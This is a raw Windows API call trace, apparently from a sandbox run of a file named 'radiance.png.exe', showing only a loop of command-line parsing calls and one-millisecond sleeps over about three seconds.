	[0042.261] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190288*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.262] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.262] Sleep (dwMilliseconds=0x1) 
	[0042.311] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1902f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.311] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.311] Sleep (dwMilliseconds=0x1) 
	[0042.350] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190368*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.350] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.350] Sleep (dwMilliseconds=0x1) 
	[0042.386] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1903d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.386] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.386] Sleep (dwMilliseconds=0x1) 
	[0042.433] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190448*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.433] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.433] Sleep (dwMilliseconds=0x1) 
	[0042.454] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1904b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.454] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.454] Sleep (dwMilliseconds=0x1) 
	[0042.495] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190528*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.495] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.495] Sleep (dwMilliseconds=0x1) 
	[0042.535] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190598*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.535] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.535] Sleep (dwMilliseconds=0x1) 
	[0042.574] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190608*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.574] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.574] Sleep (dwMilliseconds=0x1) 
	[0042.620] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190678*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.620] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.620] Sleep (dwMilliseconds=0x1) 
	[0042.667] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1906e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.667] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.667] Sleep (dwMilliseconds=0x1) 
	[0042.713] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190758*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.713] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.713] Sleep (dwMilliseconds=0x1) 
	[0042.760] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1907c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.760] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.760] Sleep (dwMilliseconds=0x1) 
	[0042.807] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190838*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.807] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.807] Sleep (dwMilliseconds=0x1) 
	[0042.842] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1908a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.842] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.842] Sleep (dwMilliseconds=0x1) 
	[0042.885] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190918*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.885] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.885] Sleep (dwMilliseconds=0x1) 
	[0042.932] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190988*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.932] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.932] Sleep (dwMilliseconds=0x1) 
	[0042.966] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1909f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.966] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.966] Sleep (dwMilliseconds=0x1) 
	[0042.994] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190a68*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0042.994] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0042.995] Sleep (dwMilliseconds=0x1) 
	[0043.010] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190ad8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.010] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.010] Sleep (dwMilliseconds=0x1) 
	[0043.057] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190b48*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.057] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.057] Sleep (dwMilliseconds=0x1) 
	[0043.104] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190bb8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.104] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.104] Sleep (dwMilliseconds=0x1) 
	[0043.136] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190c28*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.136] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.136] Sleep (dwMilliseconds=0x1) 
	[0043.160] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190c98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.161] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.161] Sleep (dwMilliseconds=0x1) 
	[0043.182] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190d08*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.182] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.182] Sleep (dwMilliseconds=0x1) 
	[0043.223] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190d78*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.223] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.223] Sleep (dwMilliseconds=0x1) 
	[0043.264] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190de8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.264] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.264] Sleep (dwMilliseconds=0x1) 
	[0043.306] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190e58*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.307] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.307] Sleep (dwMilliseconds=0x1) 
	[0043.354] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190ec8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.354] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.354] Sleep (dwMilliseconds=0x1) 
	[0043.403] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190f38*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.403] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.403] Sleep (dwMilliseconds=0x1) 
	[0043.447] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x190fa8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.447] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.447] Sleep (dwMilliseconds=0x1) 
	[0043.494] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191018*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.494] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.494] Sleep (dwMilliseconds=0x1) 
	[0043.527] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1910c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.528] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.528] Sleep (dwMilliseconds=0x1) 
	[0043.556] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191138*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.556] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.556] Sleep (dwMilliseconds=0x1) 
	[0043.610] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1911a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.610] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.610] Sleep (dwMilliseconds=0x1) 
	[0043.653] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191218*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.654] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.654] Sleep (dwMilliseconds=0x1) 
	[0043.698] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191288*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.698] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.698] Sleep (dwMilliseconds=0x1) 
	[0043.738] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1912f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.739] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.739] Sleep (dwMilliseconds=0x1) 
	[0043.751] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191368*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.751] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.752] Sleep (dwMilliseconds=0x1) 
	[0043.786] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1913d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.786] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.786] Sleep (dwMilliseconds=0x1) 
	[0043.826] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191448*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.827] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.827] Sleep (dwMilliseconds=0x1) 
	[0043.869] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1914b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.869] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.869] Sleep (dwMilliseconds=0x1) 
	[0043.907] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191528*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.907] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.907] Sleep (dwMilliseconds=0x1) 
	[0043.950] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191598*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.950] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.950] Sleep (dwMilliseconds=0x1) 
	[0043.990] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191608*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0043.990] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0043.990] Sleep (dwMilliseconds=0x1) 
	[0044.066] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191678*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.066] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.066] Sleep (dwMilliseconds=0x1) 
	[0044.141] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1916e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.141] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.141] Sleep (dwMilliseconds=0x1) 
	[0044.295] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191758*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.295] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.295] Sleep (dwMilliseconds=0x1) 
	[0044.686] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1917c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.686] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.686] Sleep (dwMilliseconds=0x1) 
	[0044.790] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191838*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.790] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.790] Sleep (dwMilliseconds=0x1) 
	[0044.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1918a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.835] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.835] Sleep (dwMilliseconds=0x1) 
	[0044.886] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191918*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.886] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.886] Sleep (dwMilliseconds=0x1) 
	[0044.929] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191988*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.929] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.929] Sleep (dwMilliseconds=0x1) 
	[0044.977] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1919f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0044.977] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0044.977] Sleep (dwMilliseconds=0x1) 
	[0045.022] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191a68*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.022] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.022] Sleep (dwMilliseconds=0x1) 
	[0045.049] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191ad8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.049] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.049] Sleep (dwMilliseconds=0x1) 
	[0045.058] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191b48*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.058] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.058] Sleep (dwMilliseconds=0x1) 
	[0045.069] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191bb8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.069] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.069] Sleep (dwMilliseconds=0x1) 
	[0045.085] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191c28*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.085] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.085] Sleep (dwMilliseconds=0x1) 
	[0045.100] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191c98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.100] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.100] Sleep (dwMilliseconds=0x1) 
	[0045.116] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191d08*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.116] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.116] Sleep (dwMilliseconds=0x1) 
	[0045.132] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191d78*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.132] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.132] Sleep (dwMilliseconds=0x1) 
	[0045.151] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191de8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.151] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.151] Sleep (dwMilliseconds=0x1) 
	[0045.163] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191e58*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0045.163] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0045.163] Sleep (dwMilliseconds=0x1) 
	[0045.185] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x191ec8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
